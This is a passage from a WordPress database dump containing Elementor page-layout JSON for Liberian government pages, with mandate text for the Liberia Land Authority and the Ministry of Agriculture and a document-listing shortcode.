{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9160c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The LLA\'s mandate of the Authority is to develop policies on a continuous basis, undertake actions and implement programs in support of land governance, including land administration and management in Liberia. LLA is a product of the policy, legal and institutional reform of the land sector of Liberia led by the erstwhile Land Commission.\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8e15880\",\"elType\":\"widget\",\"settings\":{\"title\":\"LLA Resources\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2b443bf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"98191f5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1a23dcc\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"10985b1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"aba2824\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ea59929\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1a23dcc\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d679c64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4cae02f\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9344,1632,'_elementor_controls_usage','a:0:{}'),(9345,1632,'_elementor_edit_mode','builder'),(9346,1632,'_elementor_template_type','wp-post'),(9347,1632,'_elementor_version','2.7.5'),(9348,1632,'_wp_page_template','default'),(9349,1632,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9160c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The LLA\'s mandate of the Authority is to develop policies on a continuous basis, undertake actions and implement programs in support of land governance, including land administration and management in Liberia. LLA is a product of the policy, legal and institutional reform of the land sector of Liberia led by the erstwhile Land Commission.\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2b443bf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"98191f5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1a23dcc\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"10985b1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"aba2824\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ea59929\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1a23dcc\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"d679c64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4cae02f\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9350,1600,'_edit_lock','1629233184:42'),(9351,1598,'_edit_lock','1631105879:38'),(9352,1596,'_edit_lock','1629243195:42'),(9353,1594,'_edit_lock','1631104448:38'),(9354,1633,'_elementor_controls_usage','a:0:{}'),(9355,1633,'_elementor_edit_mode','builder'),(9356,1633,'_elementor_template_type','wp-post'),(9357,1633,'_elementor_version','2.7.5'),(9358,1633,'_wp_page_template','default'),(9359,1633,'_elementor_data','[{\"id\":\"42f3301\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e4b6de6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"a1bb6a5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7f350b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry\'s mandate is to develop the agriculture sector in Liberia. MOA\\u00a0creates an enabling environment for a more dynamic and vibrant agricultural sector to ensure sustainable food security and employment opportunities for all Liberians.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8e15880\",\"elType\":\"widget\",\"settings\":{\"title\":\"MOA Resources\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"800b01c\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ae041f9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"759bc05\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"138bbb1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"bb7acbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"855e3aa\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" term=\\\"document_tag:moa\\\" columns=\\\"title,excerpt,cf:download_link,tax:document_category\\\" widths=\\\"350px,900px,auto,auto\\\" links=\\\"terms\\\" filters=\\\"false\\\" rows_per_page=\\\"5\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(9360,1634,'_elementor_controls_usage','a:0:{}'),(9361,1634,'_elementor_edit_mode','builder'),(9362,1634,'_elementor_template_type','wp-post'),(9363,1634,'_elementor_version','2.7.5'),(9364,1634,'_wp_page_template','default'),(9365,1634,'_elementor_data','[{\"id\":\"42f3301\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e4b6de6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a1bb6a5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7f350b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry\'s mandate is to develop the agriculture sector in Liberia. MOA\\u00a0creates an enabling environment for a more dynamic and vibrant agricultural sector to ensure sustainable food security and employment opportunities for all Liberians.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"800b01c\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ae041f9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"759bc05\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"138bbb1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"bb7acbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"855e3aa\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" term=\\\"document_tag:moa\\\" columns=\\\"title,excerpt,cf:download_link,tax:document_category\\\" widths=\\\"350px,900px,auto,auto\\\" links=\\\"terms\\\" filters=\\\"false\\\" 